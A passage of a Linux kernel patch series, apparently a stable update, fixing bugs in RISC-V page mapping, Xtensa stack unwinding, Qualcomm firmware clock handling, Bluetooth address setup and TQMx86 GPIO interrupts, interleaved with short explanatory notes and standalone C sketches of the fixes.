+ 	min_low_pfn = PFN_UP(phys_ram_base);
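
The reservation above exists because, on 32-bit, linearly mapping the last page of RAM would produce virtual addresses inside the ERR_PTR() range: IS_ERR_VALUE() treats the top MAX_ERRNO bytes of the address space as encoded error codes. A sketch of that range check (MAX_ERRNO is 4095 in the kernel):

#include <stdio.h>

#define MAX_ERRNO	4095
#define IS_ERR_VALUE(x)	((unsigned long)(x) >= (unsigned long)-MAX_ERRNO)

int main(void)
{
	void *err = (void *)-12L;	/* same bits as ERR_PTR(-ENOMEM) */
	void *ok  = (void *)0x1000L;

	printf("%d %d\n", (int)IS_ERR_VALUE(err), (int)IS_ERR_VALUE(ok));	/* 1 0 */
	return 0;
}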
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index 9587e44874152..d0557a4ab8f9b 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -386,17 +386,33 @@ int set_direct_map_default_noflush(struct page *page)
+ }
+ 
+ #ifdef CONFIG_DEBUG_PAGEALLOC
++static int debug_pagealloc_set_page(pte_t *pte, unsigned long addr, void *data)
++{
++	int enable = *(int *)data;
++
++	unsigned long val = pte_val(ptep_get(pte));
++
++	if (enable)
++		val |= _PAGE_PRESENT;
++	else
++		val &= ~_PAGE_PRESENT;
++
++	set_pte(pte, __pte(val));
++
++	return 0;
++}
++
+ void __kernel_map_pages(struct page *page, int numpages, int enable)
+ {
+ 	if (!debug_pagealloc_enabled())
+ 		return;
+ 
+-	if (enable)
+-		__set_memory((unsigned long)page_address(page), numpages,
+-			     __pgprot(_PAGE_PRESENT), __pgprot(0));
+-	else
+-		__set_memory((unsigned long)page_address(page), numpages,
+-			     __pgprot(0), __pgprot(_PAGE_PRESENT));
++	unsigned long start = (unsigned long)page_address(page);
++	unsigned long size = PAGE_SIZE * numpages;
++
++	apply_to_existing_page_range(&init_mm, start, size, debug_pagealloc_set_page, &enable);
++
++	flush_tlb_kernel_range(start, start + size);
+ }
+ #endif
+ 
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 6e61baff223f8..897f56533e6cc 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
+@@ -115,9 +115,9 @@ vmlinux-objs-$(CONFIG_INTEL_TDX_GUEST) += $(obj)/tdx.o $(obj)/tdcall.o
+ 
+ vmlinux-objs-$(CONFIG_EFI) += $(obj)/efi.o
+ vmlinux-objs-$(CONFIG_EFI_MIXED) += $(obj)/efi_mixed.o
+-vmlinux-objs-$(CONFIG_EFI_STUB) += $(objtree)/drivers/firmware/efi/libstub/lib.a
++vmlinux-libs-$(CONFIG_EFI_STUB) += $(objtree)/drivers/firmware/efi/libstub/lib.a
+ 
+-$(obj)/vmlinux: $(vmlinux-objs-y) FORCE
++$(obj)/vmlinux: $(vmlinux-objs-y) $(vmlinux-libs-y) FORCE
+ 	$(call if_changed,ld)
+ 
+ OBJCOPYFLAGS_vmlinux.bin :=  -R .comment -S
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 8ea24df3c5ff1..e8cc042e4905c 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -195,7 +195,14 @@ static int __amd_smn_rw(u16 node, u32 address, u32 *value, bool write)
+ 
+ int amd_smn_read(u16 node, u32 address, u32 *value)
+ {
+-	return __amd_smn_rw(node, address, value, false);
++	int err = __amd_smn_rw(node, address, value, false);
++
++	if (PCI_POSSIBLE_ERROR(*value)) {
++		err = -ENODEV;
++		*value = 0;
++	}
++
++	return err;
+ }
+ EXPORT_SYMBOL_GPL(amd_smn_read);
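
A failed PCI read (for instance when the device has dropped off the bus) completes with all bits set, so a 0xffffffff result is indistinguishable from valid data unless it is checked explicitly; that is what PCI_POSSIBLE_ERROR() does above. The shape of the check, as a standalone sketch (the constant stands in for the kernel's PCI_ERROR_RESPONSE):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define ERROR_RESPONSE	0xffffffffU	/* all-ones: likely a failed read */

static int checked_read(uint32_t raw, uint32_t *value)
{
	if (raw == ERROR_RESPONSE) {
		*value = 0;	/* don't hand the bogus pattern to callers */
		return -ENODEV;
	}
	*value = raw;
	return 0;
}

int main(void)
{
	uint32_t v;
	int err = checked_read(0xffffffffU, &v);

	printf("err=%d value=%#x\n", err, v);
	return 0;
}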
+ 
+diff --git a/arch/xtensa/include/asm/processor.h b/arch/xtensa/include/asm/processor.h
+index 228e4dff5fb2d..ab555a980147b 100644
+--- a/arch/xtensa/include/asm/processor.h
++++ b/arch/xtensa/include/asm/processor.h
+@@ -113,9 +113,9 @@
+ #define MAKE_RA_FOR_CALL(ra,ws)   (((ra) & 0x3fffffff) | (ws) << 30)
+ 
+ /* Convert return address to a valid pc
+- * Note: We assume that the stack pointer is in the same 1GB ranges as the ra
++ * Note: 'text' is the address within the same 1GB range as the ra
+  */
+-#define MAKE_PC_FROM_RA(ra,sp)    (((ra) & 0x3fffffff) | ((sp) & 0xc0000000))
++#define MAKE_PC_FROM_RA(ra, text) (((ra) & 0x3fffffff) | ((unsigned long)(text) & 0xc0000000))
+ 
+ #elif defined(__XTENSA_CALL0_ABI__)
+ 
+@@ -125,9 +125,9 @@
+ #define MAKE_RA_FOR_CALL(ra, ws)   (ra)
+ 
+ /* Convert return address to a valid pc
+- * Note: We assume that the stack pointer is in the same 1GB ranges as the ra
++ * Note: 'text' is not used as 'ra' is always the full address
+  */
+-#define MAKE_PC_FROM_RA(ra, sp)    (ra)
++#define MAKE_PC_FROM_RA(ra, text)  (ra)
+ 
+ #else
+ #error Unsupported Xtensa ABI
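
On the windowed ABI the top two bits of the return address encode the caller's window size rather than address bits, so MAKE_PC_FROM_RA() has to borrow bits 31:30 (the 1GB region) from another address; this patch switches that donor from the stack pointer to a text address, since the stack need not sit in the same 1GB region as the code. The arithmetic, with made-up values:

#include <stdio.h>

#define MAKE_PC_FROM_RA(ra, text) \
	(((ra) & 0x3fffffffUL) | ((unsigned long)(text) & 0xc0000000UL))

int main(void)
{
	unsigned long ra   = 0x40001234UL;	/* low 30 bits hold the PC offset */
	unsigned long text = 0xd0000de0UL;	/* any address in the code's 1GB region */

	printf("pc = %#lx\n", MAKE_PC_FROM_RA(ra, text));	/* 0xc0001234 */
	return 0;
}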
+diff --git a/arch/xtensa/include/asm/ptrace.h b/arch/xtensa/include/asm/ptrace.h
+index 308f209a47407..17c5cbd1832e7 100644
+--- a/arch/xtensa/include/asm/ptrace.h
++++ b/arch/xtensa/include/asm/ptrace.h
+@@ -87,7 +87,7 @@ struct pt_regs {
+ # define user_mode(regs) (((regs)->ps & 0x00000020)!=0)
+ # define instruction_pointer(regs) ((regs)->pc)
+ # define return_pointer(regs) (MAKE_PC_FROM_RA((regs)->areg[0], \
+-					       (regs)->areg[1]))
++					       (regs)->pc))
+ 
+ # ifndef CONFIG_SMP
+ #  define profile_pc(regs) instruction_pointer(regs)
+diff --git a/arch/xtensa/kernel/process.c b/arch/xtensa/kernel/process.c
+index 68e0e2f06d660..3138f72dcbe2e 100644
+--- a/arch/xtensa/kernel/process.c
++++ b/arch/xtensa/kernel/process.c
+@@ -47,6 +47,7 @@
+ #include <asm/asm-offsets.h>
+ #include <asm/regs.h>
+ #include <asm/hw_breakpoint.h>
++#include <asm/sections.h>
+ #include <asm/traps.h>
+ 
+ extern void ret_from_fork(void);
+@@ -379,7 +380,7 @@ unsigned long __get_wchan(struct task_struct *p)
+ 	int count = 0;
+ 
+ 	sp = p->thread.sp;
+-	pc = MAKE_PC_FROM_RA(p->thread.ra, p->thread.sp);
++	pc = MAKE_PC_FROM_RA(p->thread.ra, _text);
+ 
+ 	do {
+ 		if (sp < stack_page + sizeof(struct task_struct) ||
+@@ -391,7 +392,7 @@ unsigned long __get_wchan(struct task_struct *p)
+ 
+ 		/* Stack layout: sp-4: ra, sp-3: sp' */
+ 
+-		pc = MAKE_PC_FROM_RA(SPILL_SLOT(sp, 0), sp);
++		pc = MAKE_PC_FROM_RA(SPILL_SLOT(sp, 0), _text);
+ 		sp = SPILL_SLOT(sp, 1);
+ 	} while (count++ < 16);
+ 	return 0;
+diff --git a/arch/xtensa/kernel/stacktrace.c b/arch/xtensa/kernel/stacktrace.c
+index 7f7755cd28f07..b69044893287f 100644
+--- a/arch/xtensa/kernel/stacktrace.c
++++ b/arch/xtensa/kernel/stacktrace.c
+@@ -12,6 +12,8 @@
+ #include <linux/sched.h>
+ #include <linux/stacktrace.h>
+ 
++#include <asm/ftrace.h>
++#include <asm/sections.h>
+ #include <asm/stacktrace.h>
+ #include <asm/traps.h>
+ #include <linux/uaccess.h>
+@@ -188,7 +190,7 @@ void walk_stackframe(unsigned long *sp,
+ 		if (a1 <= (unsigned long)sp)
+ 			break;
+ 
+-		frame.pc = MAKE_PC_FROM_RA(a0, a1);
++		frame.pc = MAKE_PC_FROM_RA(a0, _text);
+ 		frame.sp = a1;
+ 
+ 		if (fn(&frame, data))
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index 8d87808cdb8aa..30204e62497c2 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -2657,8 +2657,11 @@ static ssize_t uevent_show(struct device *dev, struct device_attribute *attr,
+ 	if (!env)
+ 		return -ENOMEM;
+ 
++	/* Synchronize with really_probe() */
++	device_lock(dev);
+ 	/* let the kset specific function add its keys */
+ 	retval = kset->uevent_ops->uevent(&dev->kobj, env);
++	device_unlock(dev);
+ 	if (retval)
+ 		goto out;
+ 
+diff --git a/drivers/block/null_blk/zoned.c b/drivers/block/null_blk/zoned.c
+index 55a69e48ef8bc..b0264b3df6f3d 100644
+--- a/drivers/block/null_blk/zoned.c
++++ b/drivers/block/null_blk/zoned.c
+@@ -112,7 +112,7 @@ int null_init_zoned_dev(struct nullb_device *dev, struct request_queue *q)
+ 	if (dev->zone_max_active && dev->zone_max_open > dev->zone_max_active) {
+ 		dev->zone_max_open = dev->zone_max_active;
+ 		pr_info("changed the maximum number of open zones to %u\n",
+-			dev->nr_zones);
++			dev->zone_max_open);
+ 	} else if (dev->zone_max_open >= dev->nr_zones - dev->zone_nr_conv) {
+ 		dev->zone_max_open = 0;
+ 		pr_info("zone_max_open limit disabled, limit >= zone count\n");
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index 2dda94a0875a6..35fb26cbf2294 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -408,6 +408,14 @@ static int qca_tlv_check_data(struct hci_dev *hdev,
+ 
+ 			/* Update NVM tags as needed */
+ 			switch (tag_id) {
++			case EDL_TAG_ID_BD_ADDR:
++				if (tag_len != sizeof(bdaddr_t))
++					return -EINVAL;
++
++				memcpy(&config->bdaddr, tlv_nvm->data, sizeof(bdaddr_t));
++
++				break;
++
+ 			case EDL_TAG_ID_HCI:
+ 				if (tag_len < 3)
+ 					return -EINVAL;
+@@ -682,6 +690,38 @@ int qca_set_bdaddr_rome(struct hci_dev *hdev, const bdaddr_t *bdaddr)
+ }
+ EXPORT_SYMBOL_GPL(qca_set_bdaddr_rome);
+ 
++static int qca_check_bdaddr(struct hci_dev *hdev, const struct qca_fw_config *config)
++{
++	struct hci_rp_read_bd_addr *bda;
++	struct sk_buff *skb;
++	int err;
++
++	if (bacmp(&hdev->public_addr, BDADDR_ANY))
++		return 0;
++
++	skb = __hci_cmd_sync(hdev, HCI_OP_READ_BD_ADDR, 0, NULL,
++			     HCI_INIT_TIMEOUT);
++	if (IS_ERR(skb)) {
++		err = PTR_ERR(skb);
++		bt_dev_err(hdev, "Failed to read device address (%d)", err);
++		return err;
++	}
++
++	if (skb->len != sizeof(*bda)) {
++		bt_dev_err(hdev, "Device address length mismatch");
++		kfree_skb(skb);
++		return -EIO;
++	}
++
++	bda = (struct hci_rp_read_bd_addr *)skb->data;
++	if (!bacmp(&bda->bdaddr, &config->bdaddr))
++		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
++
++	kfree_skb(skb);
++
++	return 0;
++}
++
+ static void qca_generate_hsp_nvm_name(char *fwname, size_t max_size,
+ 		struct qca_btsoc_version ver, u8 rom_ver, u16 bid)
+ {
+@@ -703,7 +743,7 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		   enum qca_btsoc_type soc_type, struct qca_btsoc_version ver,
+ 		   const char *firmware_name)
+ {
+-	struct qca_fw_config config;
++	struct qca_fw_config config = {};
+ 	int err;
+ 	u8 rom_ver = 0;
+ 	u32 soc_ver;
+@@ -888,6 +928,10 @@ int qca_uart_setup(struct hci_dev *hdev, uint8_t baudrate,
+ 		break;
+ 	}
+ 
++	err = qca_check_bdaddr(hdev, &config);
++	if (err)
++		return err;
++
+ 	bt_dev_info(hdev, "QCA setup on UART is completed");
+ 
+ 	return 0;
+diff --git a/drivers/bluetooth/btqca.h b/drivers/bluetooth/btqca.h
+index 38e2fbc950248..215433fd76a10 100644
+--- a/drivers/bluetooth/btqca.h
++++ b/drivers/bluetooth/btqca.h
+@@ -29,6 +29,7 @@
+ #define EDL_PATCH_CONFIG_RES_EVT	(0x00)
+ #define QCA_DISABLE_LOGGING_SUB_OP	(0x14)
+ 
++#define EDL_TAG_ID_BD_ADDR		2
+ #define EDL_TAG_ID_HCI			(17)
+ #define EDL_TAG_ID_DEEP_SLEEP		(27)
+ 
+@@ -93,6 +94,7 @@ struct qca_fw_config {
+ 	uint8_t user_baud_rate;
+ 	enum qca_tlv_dnld_mode dnld_mode;
+ 	enum qca_tlv_dnld_mode dnld_type;
++	bdaddr_t bdaddr;
+ };
+ 
+ struct edl_event_hdr {
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index a0e2b5d992695..070014d0fc994 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1853,8 +1853,6 @@ static int qca_setup(struct hci_uart *hu)
+ 	case QCA_WCN6750:
+ 	case QCA_WCN6855:
+ 	case QCA_WCN7850:
+-		set_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks);
+-
+ 		qcadev = serdev_device_get_drvdata(hu->serdev);
+ 		if (qcadev->bdaddr_property_broken)
+ 			set_bit(HCI_QUIRK_BDADDR_PROPERTY_BROKEN, &hdev->quirks);
+diff --git a/drivers/clk/sifive/sifive-prci.c b/drivers/clk/sifive/sifive-prci.c
+index 916d2fc28b9c1..39bfbd120e0bc 100644
+--- a/drivers/clk/sifive/sifive-prci.c
++++ b/drivers/clk/sifive/sifive-prci.c
+@@ -4,7 +4,6 @@
+  * Copyright (C) 2020 Zong Li
+  */
+ 
+-#include <linux/clkdev.h>
+ #include <linux/delay.h>
+ #include <linux/io.h>
+ #include <linux/of_device.h>
+@@ -536,13 +535,6 @@ static int __prci_register_clocks(struct device *dev, struct __prci_data *pd,
+ 			return r;
+ 		}
+ 
+-		r = clk_hw_register_clkdev(&pic->hw, pic->name, dev_name(dev));
+-		if (r) {
+-			dev_warn(dev, "Failed to register clkdev for %s: %d\n",
+-				 init.name, r);
+-			return r;
+-		}
+-
+ 		pd->hw_clks.hws[i] = &pic->hw;
+ 	}
+ 
+diff --git a/drivers/dma/dma-axi-dmac.c b/drivers/dma/dma-axi-dmac.c
+index f30dabc99795d..176cf3665a185 100644
+--- a/drivers/dma/dma-axi-dmac.c
++++ b/drivers/dma/dma-axi-dmac.c
+@@ -1036,8 +1036,8 @@ static int axi_dmac_remove(struct platform_device *pdev)
+ {
+ 	struct axi_dmac *dmac = platform_get_drvdata(pdev);
+ 
+-	of_dma_controller_free(pdev->dev.of_node);
+ 	free_irq(dmac->irq, dmac);
++	of_dma_controller_free(pdev->dev.of_node);
+ 	tasklet_kill(&dmac->chan.vchan.task);
+ 	dma_async_device_unregister(&dmac->dma_dev);
+ 	clk_disable_unprepare(dmac->clk);
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index 58f1a86065dc9..619cd6548cf64 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -495,13 +495,14 @@ int qcom_scm_pas_init_image(u32 peripheral, const void *metadata, size_t size,
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	desc.args[1] = mdata_phys;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+-
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ out:
+@@ -563,10 +564,12 @@ int qcom_scm_pas_mem_setup(u32 peripheral, phys_addr_t addr, phys_addr_t size)
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ 	return ret ? : res.result[0];
+@@ -598,10 +601,12 @@ int qcom_scm_pas_auth_and_reset(u32 peripheral)
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ 	return ret ? : res.result[0];
+@@ -632,11 +637,12 @@ int qcom_scm_pas_shutdown(u32 peripheral)
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+-
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ 	return ret ? : res.result[0];
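
All four qcom_scm hunks fix the same leak: when qcom_scm_bw_enable() failed, the early "return ret" skipped qcom_scm_clk_disable() and left the clocks referenced forever. The goto rewrites restore the usual reverse-order unwind, sketched generically here (enable_a/enable_b and the error values are placeholders):

#include <stdio.h>

static int enable_a(void)   { return 0; }
static void disable_a(void) { }
static int enable_b(void)   { return -16; }	/* simulate -EBUSY */
static void disable_b(void) { }

static int do_call(void)
{
	int ret = enable_a();			/* first resource */

	if (ret)
		return ret;			/* nothing to undo yet */

	ret = enable_b();			/* second resource */
	if (ret)
		goto out_disable_a;		/* undo only what we hold */

	/* ... the actual firmware call ... */

	disable_b();
out_disable_a:
	disable_a();
	return ret;
}

int main(void)
{
	printf("ret=%d\n", do_call());	/* -16, with resource a released */
	return 0;
}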
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index 700f71c954956..b23ef29f56020 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -1416,7 +1416,7 @@ config GPIO_TPS68470
+ 	  are "output only" GPIOs.
+ 
+ config GPIO_TQMX86
+-	tristate "TQ-Systems QTMX86 GPIO"
++	tristate "TQ-Systems TQMx86 GPIO"
+ 	depends on MFD_TQMX86 || COMPILE_TEST
+ 	depends on HAS_IOPORT_MAP
+ 	select GPIOLIB_IRQCHIP
+diff --git a/drivers/gpio/gpio-tqmx86.c b/drivers/gpio/gpio-tqmx86.c
+index e739dcea61b23..f2e7e8754d95d 100644
+--- a/drivers/gpio/gpio-tqmx86.c
++++ b/drivers/gpio/gpio-tqmx86.c
+@@ -6,6 +6,7 @@
+  *   Vadim V.Vlasov <vvlasov@dev.rtsoft.ru>
+  */
+ 
++#include <linux/bitmap.h>
+ #include <linux/bitops.h>
+ #include <linux/errno.h>
+ #include <linux/gpio/driver.h>
+@@ -15,6 +16,7 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_runtime.h>
++#include <linux/seq_file.h>
+ #include <linux/slab.h>
+ 
+ #define TQMX86_NGPIO	8
+@@ -27,17 +29,25 @@
+ #define TQMX86_GPIIC	3	/* GPI Interrupt Configuration Register */
+ #define TQMX86_GPIIS	4	/* GPI Interrupt Status Register */
+ 
++#define TQMX86_GPII_NONE	0
+ #define TQMX86_GPII_FALLING	BIT(0)
+ #define TQMX86_GPII_RISING	BIT(1)
++/* Stored in irq_type as a trigger type, but not actually valid as a register
++ * value, so the name doesn't use "GPII"
++ */
++#define TQMX86_INT_BOTH		(BIT(0) | BIT(1))
+ #define TQMX86_GPII_MASK	(BIT(0) | BIT(1))
+ #define TQMX86_GPII_BITS	2
++/* Stored in irq_type with GPII bits */
++#define TQMX86_INT_UNMASKED	BIT(2)
+ 
+ struct tqmx86_gpio_data {
+ 	struct gpio_chip	chip;
+-	struct irq_chip		irq_chip;
+ 	void __iomem		*io_base;
+ 	int			irq;
++	/* Lock must be held for accessing output and irq_type fields */
+ 	raw_spinlock_t		spinlock;
++	DECLARE_BITMAP(output, TQMX86_NGPIO);
+ 	u8			irq_type[TQMX86_NGPI];
+ };
+ 
+@@ -64,15 +74,10 @@ static void tqmx86_gpio_set(struct gpio_chip *chip, unsigned int offset,
+ {
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(chip);
+ 	unsigned long flags;
+-	u8 val;
+ 
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	val = tqmx86_gpio_read(gpio, TQMX86_GPIOD);
+-	if (value)
+-		val |= BIT(offset);
+-	else
+-		val &= ~BIT(offset);
+-	tqmx86_gpio_write(gpio, val, TQMX86_GPIOD);
++	__assign_bit(offset, gpio->output, value);
++	tqmx86_gpio_write(gpio, bitmap_get_value8(gpio->output, 0), TQMX86_GPIOD);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
+ }
+ 
+@@ -107,21 +112,39 @@ static int tqmx86_gpio_get_direction(struct gpio_chip *chip,
+ 	return GPIO_LINE_DIRECTION_OUT;
+ }
+ 
++static void tqmx86_gpio_irq_config(struct tqmx86_gpio_data *gpio, int offset)
++	__must_hold(&gpio->spinlock)
++{
++	u8 type = TQMX86_GPII_NONE, gpiic;
++
++	if (gpio->irq_type[offset] & TQMX86_INT_UNMASKED) {
++		type = gpio->irq_type[offset] & TQMX86_GPII_MASK;
++
++		if (type == TQMX86_INT_BOTH)
++			type = tqmx86_gpio_get(&gpio->chip, offset + TQMX86_NGPO)
++				? TQMX86_GPII_FALLING
++				: TQMX86_GPII_RISING;
++	}
++
++	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
++	gpiic &= ~(TQMX86_GPII_MASK << (offset * TQMX86_GPII_BITS));
++	gpiic |= type << (offset * TQMX86_GPII_BITS);
++	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++}
++
+ static void tqmx86_gpio_irq_mask(struct irq_data *data)
+ {
+ 	unsigned int offset = (data->hwirq - TQMX86_NGPO);
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(
+ 		irq_data_get_irq_chip_data(data));
+ 	unsigned long flags;
+-	u8 gpiic, mask;
+-
+-	mask = TQMX86_GPII_MASK << (offset * TQMX86_GPII_BITS);
+ 
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
+-	gpiic &= ~mask;
+-	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++	gpio->irq_type[offset] &= ~TQMX86_INT_UNMASKED;
++	tqmx86_gpio_irq_config(gpio, offset);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
++
++	gpiochip_disable_irq(&gpio->chip, irqd_to_hwirq(data));
+ }
+ 
+ static void tqmx86_gpio_irq_unmask(struct irq_data *data)
+@@ -130,15 +153,12 @@ static void tqmx86_gpio_irq_unmask(struct irq_data *data)
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(
+ 		irq_data_get_irq_chip_data(data));
+ 	unsigned long flags;
+-	u8 gpiic, mask;
+ 
+-	mask = TQMX86_GPII_MASK << (offset * TQMX86_GPII_BITS);
++	gpiochip_enable_irq(&gpio->chip, irqd_to_hwirq(data));
+ 
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
+-	gpiic &= ~mask;
+-	gpiic |= gpio->irq_type[offset] << (offset * TQMX86_GPII_BITS);
+-	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++	gpio->irq_type[offset] |= TQMX86_INT_UNMASKED;
++	tqmx86_gpio_irq_config(gpio, offset);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
+ }
+ 
+@@ -149,7 +169,7 @@ static int tqmx86_gpio_irq_set_type(struct irq_data *data, unsigned int type)
+ 	unsigned int offset = (data->hwirq - TQMX86_NGPO);
+ 	unsigned int edge_type = type & IRQF_TRIGGER_MASK;
+ 	unsigned long flags;
+-	u8 new_type, gpiic;
++	u8 new_type;
+ 
+ 	switch (edge_type) {
+ 	case IRQ_TYPE_EDGE_RISING:
+@@ -159,19 +179,16 @@ static int tqmx86_gpio_irq_set_type(struct irq_data *data, unsigned int type)
+ 		new_type = TQMX86_GPII_FALLING;
+ 		break;
+ 	case IRQ_TYPE_EDGE_BOTH:
+-		new_type = TQMX86_GPII_FALLING | TQMX86_GPII_RISING;
++		new_type = TQMX86_INT_BOTH;
+ 		break;
+ 	default:
+ 		return -EINVAL; /* not supported */
+ 	}
+ 
+-	gpio->irq_type[offset] = new_type;
+-
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
+-	gpiic &= ~((TQMX86_GPII_MASK) << (offset * TQMX86_GPII_BITS));
+-	gpiic |= new_type << (offset * TQMX86_GPII_BITS);
+-	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++	gpio->irq_type[offset] &= ~TQMX86_GPII_MASK;
++	gpio->irq_type[offset] |= new_type;
++	tqmx86_gpio_irq_config(gpio, offset);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
+ 
+ 	return 0;
+@@ -182,8 +199,8 @@ static void tqmx86_gpio_irq_handler(struct irq_desc *desc)
+ 	struct gpio_chip *chip = irq_desc_get_handler_data(desc);
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(chip);
+ 	struct irq_chip *irq_chip = irq_desc_get_chip(desc);
+-	unsigned long irq_bits;
+-	int i = 0;
++	unsigned long irq_bits, flags;
++	int i;
+ 	u8 irq_status;
+ 
+ 	chained_irq_enter(irq_chip, desc);
+@@ -192,6 +209,34 @@ static void tqmx86_gpio_irq_handler(struct irq_desc *desc)
+ 	tqmx86_gpio_write(gpio, irq_status, TQMX86_GPIIS);
+ 
+ 	irq_bits = irq_status;
++
++	raw_spin_lock_irqsave(&gpio->spinlock, flags);
++	for_each_set_bit(i, &irq_bits, TQMX86_NGPI) {
++		/*
++		 * Edge-both triggers are implemented by flipping the edge
++		 * trigger after each interrupt, as the controller only supports
++		 * either rising or falling edge triggers, but not both.
++		 *
++		 * Internally, the TQMx86 GPIO controller has separate status
++		 * registers for rising and falling edge interrupts. GPIIC
++		 * configures which bits from which register are visible in the
++		 * interrupt status register GPIIS and defines what triggers the
++		 * parent IRQ line. Writing to GPIIS always clears both rising
++		 * and falling interrupt flags internally, regardless of the
++		 * currently configured trigger.
++		 *
++		 * In consequence, we can cleanly implement the edge-both
++		 * trigger in software by first clearing the interrupt and then
++		 * setting the new trigger based on the current GPIO input in
++		 * tqmx86_gpio_irq_config() - even if an edge arrives between
++		 * reading the input and setting the trigger, we will have a new
++		 * interrupt pending.
++		 */
++		if ((gpio->irq_type[i] & TQMX86_GPII_MASK) == TQMX86_INT_BOTH)
++			tqmx86_gpio_irq_config(gpio, i);
++	}
++	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
++
+ 	for_each_set_bit(i, &irq_bits, TQMX86_NGPI)
+ 		generic_handle_domain_irq(gpio->chip.irq.domain,
+ 					  i + TQMX86_NGPO);
+@@ -226,6 +271,22 @@ static void tqmx86_init_irq_valid_mask(struct gpio_chip *chip,
+ 	clear_bit(3, valid_mask);
+ }
+ 
++static void tqmx86_gpio_irq_print_chip(struct irq_data *d, struct seq_file *p)
++{
++	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
++
++	seq_printf(p, gc->label);
++}
++
++static const struct irq_chip tqmx86_gpio_irq_chip = {
++	.irq_mask = tqmx86_gpio_irq_mask,
++	.irq_unmask = tqmx86_gpio_irq_unmask,
++	.irq_set_type = tqmx86_gpio_irq_set_type,
++	.irq_print_chip = tqmx86_gpio_irq_print_chip,
++	.flags = IRQCHIP_IMMUTABLE,
++	GPIOCHIP_IRQ_RESOURCE_HELPERS,
++};
++
+ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -259,7 +320,12 @@ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ 
+ 	tqmx86_gpio_write(gpio, (u8)~TQMX86_DIR_INPUT_MASK, TQMX86_GPIODD);
+ 
+-	platform_set_drvdata(pdev, gpio);
++	/*
++	 * Reading the previous output state is not possible with TQMx86 hardware.
++	 * Initialize all outputs to 0 to have a defined state that matches the
++	 * shadow register.
++	 */
++	tqmx86_gpio_write(gpio, 0, TQMX86_GPIOD);
+ 
+ 	chip = &gpio->chip;
+ 	chip->label = "gpio-tqmx86";
+@@ -277,14 +343,8 @@ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	if (irq > 0) {
+-		struct irq_chip *irq_chip = &gpio->irq_chip;
+ 		u8 irq_status;
+ 
+-		irq_chip->name = chip->label;
